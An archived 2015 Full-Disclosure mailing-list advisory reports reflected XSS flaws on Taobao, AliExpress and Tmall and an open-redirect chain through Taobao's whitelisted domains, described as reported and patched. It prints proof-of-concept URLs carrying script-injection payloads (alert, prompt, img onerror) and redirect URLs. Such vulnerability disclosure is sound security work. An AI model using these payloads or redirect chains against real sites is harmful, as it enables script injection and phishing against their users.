| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 22 Jan 2015 14:15:45 +0800 From: Jing Wang <justqdjing@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities *Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities* *Domains Basic:* Alibaba Taobao, AliExpress, Tmall are the top three online shopping websites belonging to Alibaba. Vulnerability Discover: Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ *(1) Domains Description:* *(1.1) http://www.taobao.com <http://www.taobao.com>* “Taobao is a Chinese website for online shopping similar to eBay and Amazon that is operated in China by Alibaba Group.” (Wikipedia) “With around 760 million product listings as of March 2013, Taobao Marketplace is one of the world’s top 10 most visited websites according to Alexa. For the year ended March 31, 2013, the combined gross merchandise volume (GMV) of Taobao Marketplace and Tmall.com exceeded 1 trillion yuan.” (Wikipedia) Alexa ranking 9 at 10:40 am Thursday, 22 January 2015 (GMT+8). *(1.2) http://aliexpress.com <http://aliexpress.com>* "Launched in 2010, AliExpress.com is an online retail service made up of mostly small Chinese businesses offering products to international online buyers. It is the most visited e-commerce website in Russia" (Wikipedia) *(1.3) http://www.tmall.com <http://www.tmall.com>* "Taobao Mall, is a Chinese-language website for business-to-consumer (B2C) online retail, spun off from Taobao, operated in the People's Republic of China by Alibaba Group. It is a platform for local Chinese and international businesses to sell brand name goods to consumers in mainland China, Hong Kong, Macau and Taiwan." (Wikipedia) *(2) Vulnerability descriptions:* Alibaba Taobao AliExpress Tmall online electronic shopping website has a security problem. It can be exploited by XSS and Covert Redirect attacks. *(3) Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS Security Vulnerabilities* The vulnerability can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7. *(3.1) Alibaba Taobao Online Electronic Shopping Website (Taobao.com ) XSS (cross site scripting) Security Vulnerability* The vulnerabilities occur at “writecookie.php?" page with "ck" parameter, e.g http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw&redirect=0 *POC Code:* http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/tetraph/ )-'";&redirect=0 *POC Video:* https://www.youtube.com/watch?v=cLzKxZ74i6Q&feature=youtu.be *Blog Details:* http://securityrelated.blogspot.com/2015/01/alibaba-taobao-online-electronic.html *(3.2) Alibaba AliExpress Online Electronic Shopping Website (Aliexpress.com) XSS Security Vulnerabilities* The vulnerabilities occur at “landing.php?" page with "cateid" "fromapp" parameters, e.g http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=3&fromapp= *POC Code:* /' "><img src=x onerror=prompt(/tetraph/)> http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6&fromapp=/' "><img src=x onerror=prompt(/tetraph/)> http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6</script>/' "><img src=x onerror=prompt(/tetraph/)><!--&fromapp= *POC Video:* https://www.youtube.com/watch?v=YShEdXo3q2c&feature=youtu.be *Blog Details:* http://securityrelated.blogspot.com/2015/01/alibaba-aliexpress-online-electronic.html *(3.3) Alibaba Tmall Online Electronic Shopping Website (Tmall.com) XSS Security Vulnerability * The vulnerabilities occur at “writecookie.php?" page with "ck" parameter, e.g http://www.tmall.com/go/app/sea/writecookie.php?ck=cn&redirect=11 *POC Code:* http://www.tmall.com/go/app/sea/writecookie.php?ck=cn"-->'-alert(/tetraph/ )-'";&redirect=1 *POC Video:* https://www.youtube.com/watch?v=k1QkoacdI1U&feature=youtu.be *Blog Details:* http://securityrelated.blogspot.com/2015/01/alibaba-tmall-online-electronic.html *(4) Alibaba Taobao(taobao.com <http://taobao.com>)Covert Redirect Security Vulnerability Based on Apple.com* *(4.1) Vulnerability description:* Alibaba Taobao has a security problem. It can be exploited by Covert Redirect attacks. Taobao will check whether the redirected URL belongs to domains in Taobao's whitelist, e.g. apple.com If this is true, the redirection will be allowed. However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Taobao to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Taobao directly. In fact, Apple.com was found can be exploited by Open Redirect vulnerabilities. Those vulnerabilities details will be published in the near future. *(4.2) *The vulnerability occurs at "redirect.htm?" page, with parameter “&url”, i.e. http://app.taobao.com/redirect.htm?url=http://itunes.apple.com/ The vulnerabilities can be attacked without user login. Tests were performed on IE (10.0) of Windows 8, Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Safari 6.1.6 of Mac OS X Lion 10.7. *(4.3) *Use a website for the tests,the redirected webpage is “ http://www.tetraph.com/blog". Just suppose it is malicious. *Vulnerable URL:* http://app.taobao.com/redirect.htm?url=http://itunes.apple.com/ *POC Code:* http://app.taobao.com/redirect.htm?url=http://apple.com/yahoo http://app.taobao.com/redirect.htm?url=http://apple.com/facebook http://app.taobao.com/redirect.htm?url=http://apple.com/amazon *Poc Video:* https://www.youtube.com/watch?v=jhnaoB_eus0&feature=youtu.be *Blog Detail:* http://securityrelated.blogspot.com/2015/01/alibaba-taobao-taobaocom-open-redirect.html http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html http://tetraph.com/covert_redirect/ Those vulnerablities were reported to Alibaba in 2014 and have been patched by the security team (just checked). Name was listed in the hall of fame by Alibaba. http://security.alibaba.com/people.htm?id=2048213134 *Blog Details:* http://www.securityrelated.blogspot.com/2015/01/alibaba-taobao-aliexpress-tmall-online.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists